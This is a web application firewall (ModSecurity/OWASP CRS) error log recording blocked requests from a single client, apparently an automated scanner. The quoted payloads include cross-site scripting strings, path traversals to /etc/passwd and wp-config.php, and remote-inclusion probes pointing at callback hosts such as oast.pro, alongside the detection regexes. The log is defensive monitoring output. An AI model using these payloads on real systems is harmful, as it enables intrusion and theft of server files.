[Tue Aug 29 11:51:30.628563 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnTlK8AAAAA"]
[Tue Aug 29 11:51:30.703134 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnTlLAAAAAA"]
[Tue Aug 29 11:51:31.554345 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnHQfMAAAAT"]
[Tue Aug 29 11:51:32.708431 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnHQfYAAAAT"]
[Tue Aug 29 11:51:33.741488 2023] [:error] [pid 2520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnYkjIAAAAD"]
[Tue Aug 29 11:51:34.888070 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnepL4AAAAK"]
[Tue Aug 29 11:51:35.061605 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnB5XQAAAAJ"]
[Tue Aug 29 11:51:35.081583 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@QAAAAI"]
[Tue Aug 29 11:51:35.622670 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnepM4AAAAK"]
[Tue Aug 29 11:51:35.670955 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5X0AAAAJ"]
[Tue Aug 29 11:51:39.595092 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnqj6cAAAAC"]
[Tue Aug 29 11:51:40.897711 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAm7nBAAAAAE"]
[Tue Aug 29 11:51:42.608828 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAjdQW8AAAAZ"]
[Tue Aug 29 11:51:44.556999 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAm7nCYAAAAE"]
[Tue Aug 29 11:51:45.560597 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnn1@EAAAAe"]
[Tue Aug 29 11:51:47.547992 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAmIbSgAAAAo"]
[Tue Aug 29 11:51:48.663300 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAn0GW8AAAAa"]
[Tue Aug 29 11:51:48.702485 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAfWOIsAAAAL"]
[Tue Aug 29 11:51:50.715708 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAlUlmAAAAA0"]
[Tue Aug 29 11:51:51.651287 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAn0GX4AAAAa"]
[Tue Aug 29 11:51:52.529032 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15aMCo-f0AAAnqj84AAAAC"]
[Tue Aug 29 11:51:53.895916 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAm80REAAAAF"]
[Tue Aug 29 11:51:53.991976 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAm7nEAAAAAE"]
[Tue Aug 29 11:51:55.730831 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAnd3CUAAAAI"]
[Tue Aug 29 11:51:55.957551 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAm7nEQAAAAE"]
[Tue Aug 29 11:51:56.591708 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnEqUMAAAAO"]
[Tue Aug 29 11:51:57.605895 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnqj90AAAAC"]
[Tue Aug 29 11:51:58.576819 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAn0GZIAAAAa"]
[Tue Aug 29 11:51:59.574375 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnGkMsAAAAR"]
[Tue Aug 29 11:51:59.574582 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAfWOJ8AAAAL"]
